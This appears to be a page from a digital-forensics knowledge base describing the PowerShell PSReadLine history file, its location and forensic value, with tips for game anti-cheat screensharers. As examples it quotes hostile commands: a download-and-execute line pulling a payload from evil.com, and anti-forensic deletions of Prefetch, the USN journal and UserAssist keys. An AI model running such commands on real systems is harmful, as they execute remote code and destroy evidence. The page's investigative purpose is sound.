PowerShell Command History

Purpose and Function

The PowerShell Command History is a feature of the PSReadLine module, which is the default command-line editing experience in modern PowerShell consoles (Windows 10/11 and newer). Its primary function is to provide convenience for the user by saving a history of all commands typed into interactive PowerShell sessions. This allows users to easily recall and re-run previous commands by pressing the up/down arrow keys.

From a DFIR perspective, this user-centric feature creates a plaintext, chronological log of an administrator's or user's actions on the command line. It can provide an unfiltered, verbatim record of manual system interaction, script execution, and potential anti-forensic activities.

Location and Structure

The command history is stored in a simple plain-text file.

  • Location: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

    • This typically resolves to: C:\Users\%username%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

The structure of the ConsoleHost_history.txt file is straightforward: each command entered by the user is appended as a new line in the file. The file does not typically store timestamps for each individual command, but the "Date Modified" timestamp of the file itself indicates the time when the last command was added (i.e., when the last interactive PowerShell session was closed).

Stored Metadata

The artifact itself is simple, containing only the raw commands as typed by the user. However, this raw data is incredibly valuable:

  • Verbatim Commands: It logs the exact commands, switches, and arguments used. This can reveal file paths, registry keys being manipulated, URLs being accessed, or encoded scripts being executed.

  • Chronological Order: Commands are stored in the order they were executed within and across sessions, providing a logical sequence of user actions.

  • User Attribution: The file is stored within a specific user's AppData profile, directly linking the command-line activity to that user account.

Forensic Value

The PowerShell command history is an invaluable artifact for reconstructing an attacker's or a malicious user's manual actions.

  • Revealing Manual Anti-Forensics: It is one of the best places to find evidence of manual evidence clearing. Commands like del C:\Windows\Prefetch\*.pf, fsutil usn deletejournal /D C:, or reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist may be captured verbatim.

  • Uncovering "Fileless" Execution: It can capture the initial commands used to execute fileless malware or bypasses. This includes commands that download and execute scripts directly in memory (IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')) or run encoded commands (powershell.exe -EncodedCommand ...).

  • Tracking File System Manipulation: It logs commands used for creating, moving, renaming, or deleting files and directories (New-Item, Move-Item, Rename-Item, Remove-Item).

  • Identifying System Reconnaissance: It can show commands used by an attacker to gather information about the system, such as Get-Process, Get-Service, or network enumeration commands.

It is important to note that this history file only logs commands from interactive PowerShell sessions. Commands executed by non-interactive scripts that are run directly (e.g., right-click -> "Run with PowerShell") are generally not logged in this file. Additionally, a savvy user can delete the ConsoleHost_history.txt file to clear their tracks.

Reflection points (SS Contest)

For a ScreenSharer, the PowerShell history file is a direct transcript of a player's command-line activities and a prime location for finding "smoking gun" evidence of bypass attempts.

  • The Confession Log: This artifact can feel like reading a confession. Finding the exact command a player typed to delete their Prefetch folder (Remove-Item C:\Windows\Prefetch\* -Recurse), clear a registry key, or execute a loader script is undeniable proof of intent.

  • Exposing Spoofed Extension Execution: If a player uses a command like Start-Process C:\Users\Player\Desktop\cheat.tmp to run a renamed cheat, that exact command might be logged in the history file, directly proving the execution of a disguised executable.

  • A Quick, High-Value Check: During a screenshare, simply opening the ConsoleHost_history.txt file in Notepad is a fast and effective check. A quick scroll can immediately reveal suspicious activity that warrants deeper investigation.

  • Evidence of Clearing: If the history file is missing, or its "Date Modified" timestamp is very recent (suggesting it was just wiped and recreated), and you find evidence of PowerShell execution in other artifacts (like Prefetch for powershell.exe), you have a strong case for evidence clearing.

PreviousShellbagsNextTemporary Files (%temp%)

Last updated